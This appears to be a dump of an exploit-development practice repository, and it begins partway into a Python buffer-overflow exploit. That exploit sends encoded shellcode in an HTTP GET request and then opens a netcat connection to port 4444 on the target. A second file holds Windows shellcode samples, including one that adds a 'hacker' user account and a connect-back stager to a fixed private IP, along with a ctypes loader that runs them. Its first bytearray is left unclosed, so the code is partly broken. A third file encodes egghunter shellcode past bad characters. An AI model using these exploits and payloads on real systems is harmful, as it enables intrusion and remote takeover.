38 | "\x61\x6d\x39\x68\x55\x6b\x73\x4d\x35\x74\x54\x35\x68\x64\x61"
39 | "\x48\x4e\x6b\x63\x68\x61\x34\x47\x71\x69\x43\x45\x36\x6c\x4b"
40 | "\x34\x4c\x70\x4b\x6d\x4b\x72\x78\x55\x4c\x56\x61\x47\x43\x4f"
41 | "\x6b\x55\x54\x6e\x6b\x46\x61\x4a\x70\x4f\x79\x77\x34\x51\x34"
42 | "\x51\x34\x51\x4b\x31\x4b\x75\x31\x53\x69\x70\x5a\x32\x71\x6b"
43 | "\x4f\x49\x70\x31\x4f\x33\x6f\x63\x6a\x4e\x6b\x44\x52\x68\x6b"
44 | "\x4e\x6d\x61\x4d\x32\x48\x54\x73\x70\x32\x67\x70\x55\x50\x63"
45 | "\x58\x70\x77\x34\x33\x50\x32\x53\x6f\x43\x64\x52\x48\x52\x6c"
46 | "\x31\x67\x77\x56\x53\x37\x4b\x4f\x79\x45\x4c\x78\x5a\x30\x73"
47 | "\x31\x77\x70\x33\x30\x55\x79\x78\x44\x70\x54\x56\x30\x53\x58"
48 | "\x56\x49\x6b\x30\x62\x4b\x53\x30\x69\x6f\x38\x55\x43\x5a\x35"
49 | "\x58\x62\x79\x52\x70\x4b\x52\x49\x6d\x63\x70\x70\x50\x37\x30"
50 | "\x32\x70\x63\x58\x49\x7a\x64\x4f\x6b\x6f\x69\x70\x69\x6f\x59"
51 | "\x45\x6f\x67\x43\x58\x74\x42\x53\x30\x37\x61\x53\x6c\x6d\x59"
52 | "\x59\x76\x50\x6a\x54\x50\x53\x66\x53\x67\x35\x38\x78\x42\x4b"
53 | "\x6b\x45\x67\x52\x47\x49\x6f\x7a\x75\x76\x37\x51\x78\x4c\x77"
54 | "\x6b\x59\x47\x48\x49\x6f\x69\x6f\x4b\x65\x56\x37\x75\x38\x63"
55 | "\x44\x7a\x4c\x47\x4b\x59\x71\x69\x6f\x79\x45\x52\x77\x4f\x67"
56 | "\x43\x58\x63\x45\x72\x4e\x50\x4d\x45\x31\x4b\x4f\x4e\x35\x35"
57 | "\x38\x63\x53\x50\x6d\x71\x74\x53\x30\x4e\x69\x6b\x53\x46\x37"
58 | "\x73\x67\x73\x67\x70\x31\x79\x66\x33\x5b\x44\x52\x51\x49\x70"
59 | "\x56\x58\x62\x79\x6d\x33\x56\x38\x47\x52\x64\x56\x64\x47\x4c"
60 | "\x75\x51\x56\x61\x6e\x6d\x72\x64\x44\x64\x46\x70\x69\x56\x65"
61 | "\x50\x43\x74\x62\x74\x62\x70\x71\x46\x56\x36\x33\x66\x62\x66"
62 | "\x42\x76\x52\x6e\x31\x46\x56\x36\x52\x73\x61\x46\x71\x78\x63"
63 | "\x49\x7a\x6c\x35\x6f\x4d\x56\x59\x6f\x38\x55\x6e\x69\x6d\x30"
64 | "\x30\x4e\x32\x76\x71\x56\x6b\x4f\x46\x50\x31\x78\x67\x78\x4d"
65 | "\x57\x55\x4d\x65\x30\x4b\x4f\x6b\x65\x6d\x6b\x68\x70\x6c\x75"
66 | "\x79\x32\x73\x66\x53\x58\x6f\x56\x4e\x75\x6f\x4d\x4f\x6d\x6b"
67 | "\x4f\x68\x55\x35\x6c\x37\x76\x63\x4c\x56\x6a\x4b\x30\x6b\x4b"
68 | "\x79\x70\x73\x45\x67\x75\x6d\x6b\x73\x77\x67\x63\x54\x32\x72"
69 | "\x4f\x63\x5a\x53\x30\x51\x43\x59\x6f\x4a\x75\x41\x41")
70 | 
71 | crash = "\x90" * 3
72 | crash += shellcode + "\x90" * (4070 - len(shellcode))
73 | # POP POP POP POP RETN
74 | crash += pack('<L', 0x10019CE1)
75 | crash += "C" * 23
76 | 
77 | payload = 'GET {} HTTP/1.0\r\n\r\n'.format(crash)
78 | 
79 | print '[+] Trying to exploit {}...'.format(host)
80 | 
81 | try:
82 |         s = socket(AF_INET, SOCK_STREAM)
83 |         s.connect((host, 80))
84 |         print '[+] Sending payload...'
85 |         s.send(payload)
86 |         s.close()
87 |         print '[+] Trying to connect to target...\n'
88 |         try:
89 |                 sleep(2)
90 |                 call(['nc', host, '4444'])
91 |         except:
92 |                 print '[!] Whoops!! Something went wrong?'
93 | except:
94 |         print '[!] Whoops!! Something went wrong?'
95 | 


--------------------------------------------------------------------------------
/Practice/shellcode_with_samples.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/python
  2 | import ctypes
  3 | 
  4 | shellcode = bytearray(
  5 | # Load the ws2_32.dll because Python does not load it by default
  6 | ctypes.windll.LoadLibrary("C:\WINDOWS\system32\ws2_32.dll")
  7 | 
  8 | # Execute command with WinExec()
  9 | # WinExec in Kernel32.dll: 7C8623AD
 10 | winexec_shellcode = bytearray(
 11 | "\x33\xc0"                          # Zero EAX
 12 | "\x50"                              # PUSH 0 to terminate lpCmdLine
 13 | "\x68\x65\x78\x65\x20"              # PUSH "exe "
 14 | "\x68\x70\x61\x64\x2e"              # PUSH "pad."
 15 | "\x68\x6e\x6f\x74\x65"              # PUSH "note"
 16 | "\x8B\xC4"                          # Save pointer to lpCmdLine
 17 | "\x6A\x01"                          # PUSH 1 for uCmdShow
 18 | "\x50"                              # PUSH 0 to temrinate uCmdShow
 19 | "\xBB\xAD\x23\x86\x7C"              # MOV EBX,KERNEL32.WinExec()
 20 | "\xFF\xD3"                          # Execute WinExec()
 21 | # Let's exit cleanly
 22 | "\x50"                              # PUSH 0 for ExitProcess(0)
 23 | "\xc7\xc0\xfa\xca\x81\x7c"          # MOV EAX,KERNEL32.ExitProcess
 24 | "\xff\xe0"                          # Execute ExitProcess(0)
 25 | )
 26 | 
 27 | # Execute command with System()
 28 | # System() in msvcrt.dll: 77C293C7
 29 | system_shellcode = bytearray(
 30 | "\x33\xc0"                          # Zero EAX
 31 | "\x50"                              # PUSH 0 to terminate command string
 32 | "\x68\x2f\x41\x44\x44"              # PUSH "/ADD"
 33 | "\x68\x68\x61\x78\x20"              # PUSH "hax "
 34 | "\x68\x6b\x65\x72\x20"              # PUSH "ker "
 35 | "\x68\x20\x68\x61\x63"              # PUSH " hac"
 36 | "\x68\x75\x73\x65\x72"              # PUSH "user"
 37 | "\x68\x6e\x65\x74\x20"              # PUSH "net "
 38 | "\x8B\xC4"                          # Save pointer to command string
 39 | "\x50"                              # PUSH 0
 40 | "\xB8\xC7\x93\xC2\x77"              # MOV EAX,MSVCRT.System
 41 | "\xFF\xD0"                          # Execute System()
 42 | # Let's exit cleanly
 43 | "\x50"                              # PUSH 0 for ExitProcess(0)
 44 | "\xc7\xc0\xfa\xca\x81\x7c"          # MOV EAX,KERNEL32.ExitProcess
 45 | "\xff\xe0"                          # Execute ExitProcess(0)
 46 | )
 47 | 
 48 | # Display message box with MessageBoxA in User32.dll
 49 | msg_shellcode = bytearray(
 50 | "\x33\xc0"                          # Zero EAX
 51 | "\x50"                              # PUSH 0 to terminate lpCaption
 52 | "\x68\x61\x79\x73\x3a"              # PUSH "ays:"
 53 | "\x68\x72\x61\x20\x73"              # PUSH "ra s"
 54 | "\x68\x53\x6f\x6d\x62"              # PUSH "Somb"
 55 | "\x8B\xCC"                          # Save pointer to lpCaption
 56 | "\x50"                              # PUSH 0 to terminate lpText
 57 | "\x68\x42\x6f\x6f\x70"              # PUSH "Boop"
 58 | "\x8B\xD4"                          # Save pointer to lpText
 59 | "\x50"                              # PUSH uType
 60 | "\x51"                              # PUSH lpCaption
 61 | "\x52"                              # PUSH lpText
 62 | "\x50"                              # PUSH hWnd
 63 | "\xBE\xEA\x07\x45\x7E"              # MOV ESI,USER32.MessageBoxA
 64 | "\xFF\xD6"                          # Execute MessageBoxA()
 65 | # Let's exit cleanly
 66 | "\x50"                              # PUSH 0 for ExitProcess(0)
 67 | "\xc7\xc0\xfa\xca\x81\x7c"          # MOV EAX,KERNEL32.ExitProcess
 68 | "\xff\xe0"                          # Execute ExitProcess(0)
 69 | )
 70 | 
 71 | # Connectback Shellcode Stager
 72 | # WS2_32.recv: 0x71AB676F
 73 | # WS2_32.connect: 0x71AB4A07
 74 | # WS2_32.WSASocketA: 0x71AB8B6A
 75 | # WS2_32.WSAStartUp: 71AB6A55
 76 | # IP Address: 192.168.193.132
 77 | # Port: 4444
 78 | stager_shellcode = bytearray(
 79 | "\x31\xdb\x66\xbb\x90\x01\x29\xdc\x54\x53\xbb\x55\x6a\xab\x71\xff\xd3\x31"
 80 | "\xff\x57\x57\x57\x57\x47\x57\x47\x57\xbb\x6a\x8b\xab\x71\xff\xd3\x89\xc7"
 81 | "\x68\xc0\xa8\xc1\x84\xb8\x02\x01\x11\x5c\xfe\xcc\x50\x89\xe2\x31\xc0\xb0"
 82 | "\x10\x50\x52\x57\xbb\x07\x4a\xab\x71\xff\xd3\xfe\xc4\x29\xc4\x89\xe5\x31"
 83 | "\xc9\x51\x50\x55\x57\xbb\x6f\x67\xab\x71\xff\xd3\xff\xe5"
 84 | )
 85 | 
 86 | # Print the total length of the shellcode
 87 | print "Total Length: ",len(shellcode)
 88 | 
 89 | # Pause just before shellcode execution and wait for key press
 90 | # Attach the debugger to Python now!
 91 | debug = raw_input("Debug pause!")
 92 | 
 93 | ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
 94 |                                           ctypes.c_int(len(shellcode)),
 95 |                                           ctypes.c_int(0x3000),
 96 |                                           ctypes.c_int(0x40))
 97 | 
 98 | buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
 99 | 
100 | ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
101 |                                      buf,
102 |                                      ctypes.c_int(len(shellcode)))
103 | 
104 | ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
105 |                                          ctypes.c_int(0),
106 |                                          ctypes.c_int(ptr),
107 |                                          ctypes.c_int(0),
108 |                                          ctypes.c_int(0),
109 |                                          ctypes.pointer(ctypes.c_int(0)))
110 | 
111 | try:
112 |     ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))
113 | except Exception as err:
114 |     print(err)
115 | 


--------------------------------------------------------------------------------
/Encoder/encoder.py:
--------------------------------------------------------------------------------
  1 | #! /usr/bin/env python3
  2 | 
  3 | """
  4 | Automating Shellcode Encoding Math
  5 | Author:         cmaddy
  6 | Description:    This script brute forces shellcode encoding with SUB EAX instructions.
  7 |                 Provide shellcode in 4 byte chunks (DWORD) and a set of good
  8 |                 characters and the script will produce the encoded version.
  9 |                 This is a BRUTE FORCE method because very little logic is applied
 10 |                 to the SUB EAX math. 0x55 is subtracted from bad chars and
 11 |                 0x01 is subtracted from good chars. It works, but you may end up
 12 |                 with many more instructions than if you had done this by hand.
 13 | """
 14 | 
 15 | import re
 16 | import argparse
 17 | from binascii import hexlify
 18 | 
 19 | # We start with our egghunter shellcode in sets of 4 bytes for DWORD
 20 | # This was generated using `egghunt.exe cstyle CMAD`
 21 | egghunter = [
 22 | "\x66\x81\xca\xff",
 23 | "\x0f\x42\x52\x6a",
 24 | "\x02\x58\xcd\x2e",
 25 | "\x3c\x05\x5a\x74",
 26 | "\xef\xb8\x44\x41", # DA
 27 | "\x4D\x43\x8b\xfa", # MC
 28 | "\xaf\x75\xea\xaf",
 29 | "\x75\xe7\xff\xe7"
 30 | ]
 31 | 
 32 | # Parse the command line arguments
 33 | parser = argparse.ArgumentParser()
 34 | parser.add_argument("--format", action="store", dest="format_argument", help="Provide a binary file produced by nasm to format into \\x format.")
 35 | args = parser.parse_args()
 36 | 
 37 | 
 38 | class Encoder(object):
 39 |     """A class for encoding shellcode. This class accepts shellcode that has been
 40 |     formatted into DWORD (4 bytes) and provided as a list. It then encodes this
 41 |     shellcode using the EAX register and SUB EAX commands. The list of good
 42 |     characters (good_chars) is used to check results and continue encoding until
 43 |     the result contains only characters found in the set of good characters.
 44 | 
 45 |     This is repeated for each DWORD. A list of instructions is assembled for the
 46 |     encoding of each DWORD and then all instructions are output, in the proper
 47 |     order, at the end. They are written to the encoded.asm file that can then be
 48 |     fed to nasm.
 49 | 
 50 |     This class can also take the bin file produced by nasm and format the final
 51 |     encoded shellcode into \\x format appropriate for exploit scripts.
 52 |     """
 53 |     # We have our list of acceptable characters
 54 |     # '0x' is included because it was an easy solution to a little problem and
 55 |     # won't affect the calculations
 56 |     # If this list is replaced/changed, keep '0x' in the list
 57 |     good_chars = ["0x", "01", "02", "03", "04", "05", "06", "07", "08", "09", "31", \
 58 |     "32", "33", "34", "35", "36", "37", "38", "39", "3b", "3c", "3d", "3e", "41", \
 59 |     "42", "43", "44", "45", "46", "47", "48", "49", "4a", "4b", "4c", "4d", "4e", \
 60 |     "4f", "50", "51", "52", "53", "54", "55", "56", "57", "58", "59", "5a", "5b", \
 61 |     "5c", "5d", "5e", "5f", "60", "61", "62", "63", "64", "65", "66", "67", "68", \
 62 |     "69", "6a", "6b", "6c", "6d", "6e", "6f", "70", "71", "72", "73", "74", "75", \
 63 |     "76", "77", "78", "79", "7a", "7b", "7c", "7d", "7e", "7f"]
 64 | 
 65 |     # Setup the variables for the files
 66 |     OUTPUT_FILE = "encoded.asm"
 67 |     ENCODED_FILE = ""
 68 | 
 69 |     # Let's track the number of calculations, for science
 70 |     calculations = 0
 71 | 
 72 |     # Initiate the list to hold the hex version of the shellcode
 73 |     egg_hex = []
 74 | 
 75 |     # Hold the isntruction set for the final output
 76 |     instructions = []
 77 | 
 78 |     def run(self):
 79 |         """Run through each step in the proper sequence to encode the provided shellcode."""
 80 |         # Go through the default processing -- creatig an asm file with encoded instructions
 81 |         if not args.format_argument:
 82 |             self.prepare_shellcode(egghunter)
 83 |             # Process each DWORD in the shellcode individually
 84 |             for i in self.egg_hex:
 85 |                 self.encode_shellcode(i)
 86 |             self.print_exit_statement()
 87 |             self.output_asm_file(self.instructions)
 88 |         # Do not encode -- process a bin file to produce \x formatted encoded instructions.
 89 |         else:
 90 |             self.ENCODED_FILE = args.format_argument
 91 |             self.format_binary()
 92 | 
 93 |     def convert_to_dword(self, shellcode):
 94 |         """Function for taking shellcode produced in \\x format and converting it to DWORD."""
 95 |         # This is in here for testing -- may move to accepting shellcode not formatted in DWORD
 96 |         # This works, but would require the rest of the code to be modified
 97 |         temp = hexlify(shellcode).decode('utf-8')
 98 |         pairs = 8
 99 |         temp_list = [temp[i:i+pairs] for i in range(0, len(temp), pairs)]
100 |         print(temp_list)
101 | 
102 |     def to_hex(self, val, nbits):
103 |         """This takes an int value and a bit width value. A hex value is returned
104 |         for the provided bit width, e.g. 32-bit
105 |         """
106 |         # It doesn't seem to matter, but there are two ways to do this, the one below and:
107 |         # return hex(val & (2**32-1))
108 |         return hex((val + (1 << nbits)) % (1 << nbits))
109 | 
110 |     def prepare_shellcode(self, shellcode):
111 |         """This function processes each DWORD value in the shellcode. It reverses
112 |         the order of each DWORD and converts the value to hex for Little Endian.
113 |         Then the list must be flipped so the last DWORD is processed first and placed on
114 |         the stack first (the stack grows downward).
115 | 
116 |         e.g. \\x75\\xe7\\x7ff\\xe7 becomes 0xe7ffe775
117 |         """
118 |         print("[+] Converting egghunter shellcode to hex...")
119 |         for i in egghunter:
120 |             # Add each Little Endian value to our list
121 |             self.egg_hex.append(i[::-1].encode('hex'))
122 |         # Reverse the list order for the stack
123 |         self.egg_hex.reverse()
124 | 
125 |     def encode_shellcode(self, i):
126 |         """This function must be run against each DWORD value. Process the
127 |         provided DWORD and append the instructions for that chunk to the
128 |         instructions list for output with output_asm_file().
129 |         """
130 |         print("[+] Processing: 0x{}".format(i))
131 |         # We use AND instrutions to zero EAX because they meet the good character criteria
132 |         # An alternate option is XOR EAX,EAX (\x21\xc0), but \xc0 is a bad character for the good_char set
133 |         self.instructions.append("AND EAX,0x554E4D4A")
134 |         self.instructions.append("AND EAX,0x2A313235")
135 | 
136 |         # Boolean value to be used for the while loop
137 |         keep_checking = True
138 | 
139 |         # Take the provided DWORD and subtract it from 0x0, e.g. 0x0 - 0xe7ffe775
140 |         integer = int(i, 16)                # Convert hex to an integer for math
141 |         chunk = 0 - integer                 # Subtract the integer value from zero
142 |         chunk = self.to_hex(chunk, 32)      # Convert negative hex value to a 32-bit width value we can use
143 | 
144 |         # Take the result and split it into four sets of two numbers (individual bytes), e.g. 18 00 18 8B
145 |         # Make sure we have something 10 characters long (four pairs and a '0x' pair)
146 |         # This is kind of a hack, but it works for our purposes
147 |         if len(chunk) == 10:
148 |             # We have 10 characters, a complete value
149 |             pairs = re.findall(r'..', chunk)
150 |         elif len(chunk) == 9:
151 |             # A zero was dropped, so add it back
152 |             chunk = chunk[:2] + "0" + chunk[2:]
153 |             pairs = re.findall(r'..', chunk)
154 |         elif len(chunk) == 8:
155 |             # Two zeroes were dropped, so add them back
156 |             chunk = chunk[:2] + "00" + chunk[2:]
157 |             pairs = re.findall(r'..', chunk)
158 | 
159 |         # Check if any of the resulting characters are not in the good characters list
160 |         # If so perform a subtraction operation and check again
161 |         print("[+] Subtracted from 0x0 to get: {}".format(chunk))
162 |         print("[+] Doing cyber maths to make the bad characters go away...")
163 | 
164 |         # The following returns a list of any good chars found in the list of pairs
165 |         # If length is not 4, then we have a bad char
166 |         # 0x1800188b returns [] because it's all bad (length of 0)
167 |         # 0x50158a51 returns ['50', '51'] because it has 50% good chars (length of 2)
168 |         while keep_checking == True:
169 |             # Remove the leading 0x for this part
170 |             pairs.remove("0x")
171 |             # Check the number of good characters
172 |             num_good_chars = len([x for x in self.good_chars if x in pairs])
173 |             # If we don't have 4 good characters, keep trying
174 |             if num_good_chars < 4:
175 |                 # Assemble the subtraction value
176 |                 sub_value = ""
177 |                 # Add a 55 for bad characters and a 01 for good characters
178 |                 for x in pairs:
179 |                     if x in self.good_chars:
180 |                         sub_value += "01"   # Good value, so just subtract 01 (00 is NULL and a bad value)
181 |                     else:
182 |                         sub_value += "55"   # Bad value, so subtract 55
183 | 
184 |                 # Perform the math with integers and return to hex
185 |                 integer = int(chunk.rstrip("L"), 16)
186 |                 sub_value = int(sub_value, 16)
187 |                 chunk = integer - sub_value
188 |                 chunk = self.to_hex(chunk, 32)
189 | 
190 |                 # Like above, ensure we have 10 character values
191 |                 if len(chunk) == 10:
192 |                     pairs = re.findall(r'..', chunk)
193 |                 elif len(chunk) == 9:
194 |                     chunk = chunk[:2] + "0" + chunk[2:]
195 |                     pairs = re.findall(r'..', chunk)
196 |                 elif len(chunk) == 8:
197 |                     chunk = chunk[:2] + "00" + chunk[2:]
198 |                     pairs = re.findall(r'..', chunk)
199 | 
200 |                 # Convert the assembled subtraction value to hex
201 |                 sub_value = hex(sub_value)
202 |                 # Convert the hex value to a string to enforce leading zeroes
203 |                 # This is probably silly, but it's going to get the job done
204 |                 sub_value = str(sub_value)
205 |                 # The leading zero for a value starting with 01 is lost, so add it back
206 |                 if sub_value.startswith("0x1"):
207 |                     sub_value = sub_value.replace("0x1", "0x01")
208 |                 # Print and append the final SUB EAX instruction
209 |                 print("[+] Result: {}".format(sub_value))
210 |                 self.instructions.append("SUB EAX,{}".format(sub_value))
211 |                 self.calculations += 1
212 |             else:
213 |                 # Stop once all four pairs, e.g. 6C 54 6C 7b, are good characters
214 |                 keep_checking = False
215 |                 print("[+] Ding, ding! Good value is: {}".format(chunk))
216 |                 self.instructions.append("SUB EAX,{}".format(chunk))
217 |                 self.instructions.append("PUSH EAX")
218 |                 print("")
219 | 
220 |     def output_asm_file(self, instructions):
221 |         """Create the asm file to hold the generated instructions and write each
222 |         instructon on its own line.
223 | 
224 |         The [BITS 32] header is added to the top so nasm will accept it. Also, the
225 |         instructions are written with the '0x' for nasm. i.e. SUB EAX,0x55555555.
226 |         The '0x' would be left off if the instructions were to be typed into a
227 |         debugger, but the intention is for this file to be used with nasm.
228 |         """
229 |         # Open the output file in binary mode for writing binary, obviously
230 |         with open(self.OUTPUT_FILE, "w+b") as output:
231 |             # Tack on this line for nasm
232 |             output.write("[BITS 32]\n")
233 |             # Write each instruction to the file on its own line
234 |             for i in instructions:
235 |                 output.write(i + "\n")
236 | 
237 |     def print_exit_statement(self):
238 |         """Just a helper function to print out some instructions and info at the end."""
239 |         print("[+] Done! Total calculations: {}".format(self.calculations))
240 |         print("[+] Take the encoded.asm output and compile it using nasm: nasm encoded.asm -o encoded.bin.")
241 |         print("[+] Then feed the bin file into this script to get your shellcode in '\\x' format!")
242 |         print("[+] Wonderful... let's get a shell.")
243 | 
244 |     def format_binary(self):
245 |         """Take the contents of a binary file and output it in \\x format."""
246 |         with open(self.ENCODED_FILE, "r+b") as encoded:
247 |             temp = hexlify(encoded.read()).decode('utf-8')
248 |             pairs = 2
249 |             temp_list = [temp[i:i+pairs] for i in range(0, len(temp), pairs)]
250 | 
251 |         # Print our new shellcode with a handy byte count
252 |         print("[+] Formatting complete: {} bytes".format(len(temp_list)))
253 |         # This gets everything in one long string
254 |         output = "\\x" + "\\x".join(temp_list)
255 |         # This separates the shellcode into smaller pieces to better fit into a script
256 |         # A length of 72 is used by default here to get 18 bytes in one line
257 |         # The number includes the '\x', so account for 4 characters if you increase/decrease
258 |         output = "\"" + "\"\n\"".join(self.splitAt(output, 72)) + "\""
259 |         print(output)
260 | 
261 |     def splitAt(self, string, length):
262 |         """Helper function to take an input string and output that string split
263 |         into chunks in the requested size. This is used to output the formatted
264 |         shellcode from format_binary() in smaller chunks rather than one large string.
265 |         """
266 |         for i in range(0, len(string), length):
267 |             yield string[i:i + length]
268 | 
269 | if __name__ == "__main__":
270 |     encoder = Encoder()
271 |     encoder.run()
272 | 


--------------------------------------------------------------------------------